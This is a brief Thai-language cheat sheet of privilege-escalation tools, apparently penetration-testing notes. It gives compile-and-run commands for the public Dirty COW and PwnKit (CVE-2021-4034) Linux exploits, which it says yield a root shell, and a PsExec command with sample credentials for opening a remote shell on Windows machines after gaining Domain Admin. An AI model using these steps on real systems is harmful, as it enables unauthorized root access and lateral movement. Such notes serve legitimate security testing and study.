Privilege Escalation Tools
1.dirty.c
คืออะไร: โค้ด Exploit ที่ใช้เจาะระบบ Linux ที่มีช่องโหว่ privilege escalation (Dirty COW)
ขั้นตอน:
ใช้คำสั่ง gcc คอมไพล์เป็น binary
gcc dirty.c -o dirty -pthread
./dirty
ผลลัพธ์: shell จะถูกยกระดับเป็น root
2.Pwnkit.c
คืออะไร: ใช้ Exploit ช่องโหว่ Polkit ใน Linux เพื่อยกระดับสิทธิ์ (CVE-2021-4034)
ใช้งาน:
ใช้คำสั่ง gcc คอมไพล์เป็น binary
gcc Pwnkit.c -o pwnkit
./pwnkit
3.PsExec64.exe
คืออะไร: เป็นของ Microsoft Sysinternals ใช้รันคำสั่งบนเครื่องเป้าหมาย Windows แบบ remote
เหมาะกับ: ใช้หลังจากได้สิทธิ์ Domain Admin เพื่อรันคำสั่งบนเครื่องอื่น
คำสั่งพื้นฐาน:
PsExec64.exe \\192.168.1.10 -u Administrator -p Pass123 cmd.exe
อธิบาย:
\\ = ระบุเครื่องเป้าหมาย
-u = ชื่อผู้ใช้
-p = รหัสผ่าน
cmd.exe = เปิด shell บนเครื่องเป้าหมาย
